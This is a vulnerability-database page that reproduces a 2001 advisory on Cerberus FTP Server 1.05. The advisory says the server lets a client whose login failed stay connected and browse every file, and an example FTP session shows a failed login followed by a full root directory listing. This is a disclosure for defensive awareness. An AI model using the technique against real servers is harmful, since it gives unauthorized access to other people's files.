Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

cerberus.ftp.txt

🗓️ 30 Apr 2001 00:00:00Reported by Andris KType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 16 Views

Cerberus FTP Server 1.05 allows unauthorized file access from remote clients on Windows systems.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Andrisk Security Advisory 2# - Cerberus FTP Server 1.05  
  
Topic: Cerberus FTP Server 1.05  
Announced: 2001-04-25  
Affects: Cerberus FTP Server 1.05  
OS : Win9x/NT  
  
I. Problem Description  
**********************  
Cerberus FTP Server 1.05 is an FTP server for Windows 9x/NT. A bug   
allows view any files from remote computer.  
  
II. Impact  
**************  
When any user try to login with username that is not specified (or wrong) ftp server alowes :   
1. Remote client stay conected  
2 .Remote client can view all files and browse directories of the remote computer   
  
Example 1:  
--------  
220-Welcome to Cerberus FTP Server  
220 Created by Grant Averett  
Name (IP:root): aaaaaaaaa  
530 Unknown user  
ftp: Login failed.  
Remote system type is WindowsNT.  
ftp> ls  
200 Port command received  
150 Opening data connection  
d---rwxrwx 1 100 84 0 Apr 29 2001 !!  
----rwxrwx 1 100 84 0 Nov 22 2000 AUTOEXEC.BAT  
-r--rwxrwx 1 100 84 289 Dec 25 2000 boot.ini  
-r--rwxrwx 1 100 84 36 Nov 22 2000 CONFIG.SYS  
-r--rwxrwx 1 100 84 4717 Jan 31 2001 ffastun.ffa  
-r--rwxrwx 1 100 84 2113536 Jan 31 2001 ffastun.ffl  
-r--rwxrwx 1 100 84 417792 Jan 31 2001 ffastun.ffo  
-r--rwxrwx 1 100 84 3620864 Jan 31 2001 ffastun0.ffx  
dr--rwxrwx 1 100 84 0 Apr 30 2001 ftproot  
-r--rwxrwx 1 100 84 0 Oct 01 2000 IO.SYS  
dr--rwxrwx 1 100 84 0 Apr 30 2001 mirc  
-r--rwxrwx 1 100 84 0 Oct 01 2000 MSDOS.SYS  
-r--rwxrwx 1 100 84 26816 Oct 01 2000 NTDETECT.COM  
-r--rwxrwx 1 100 84 156496 Oct 01 2000 ntldr  
-r--rwxrwx 1 100 84 579 Oct 28 2000 os240905.bin  
-r--rwxrwx 1 100 84 578 Nov 16 2000 os560179.bin  
-r--rwxrwx 1 100 84 163811328 Apr 27 2001 pagefile.sys  
dr--rwxrwx 1 100 84 0 Apr 29 2001 Program Files  
dr--rwxrwx 1 100 84 0 Apr 30 2001 rc5  
dr--rwxrwx 1 100 84 0 Apr 19 2001 RECYCLER  
dr--rwxrwx 1 100 84 0 Apr 30 2001 TEMP  
dr--rwxrwx 1 100 84 0 Apr 29 2001 WINNT  
-r--rwxrwx 1 100 84 1375 Apr 29 2001 winzip.log  
226 Transfer complete  
ftp>   
  
III. Solution  
*************  
At this time, no patch is available yet.  
  
IV. Credits  
***********  
Bug discovered by Andris K <[email protected]>  
  
Greets: Mareks M, Dreef (www.lam.yo.lv), coolynx, ParaTr00p  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
30 Apr 2001 00:00Current
7.4High risk
Vulners AI Score7.4
cerberus ftp serverfile access vulnerabilityunauthorized userswindows ntsecurity advisory.
16
.json
Report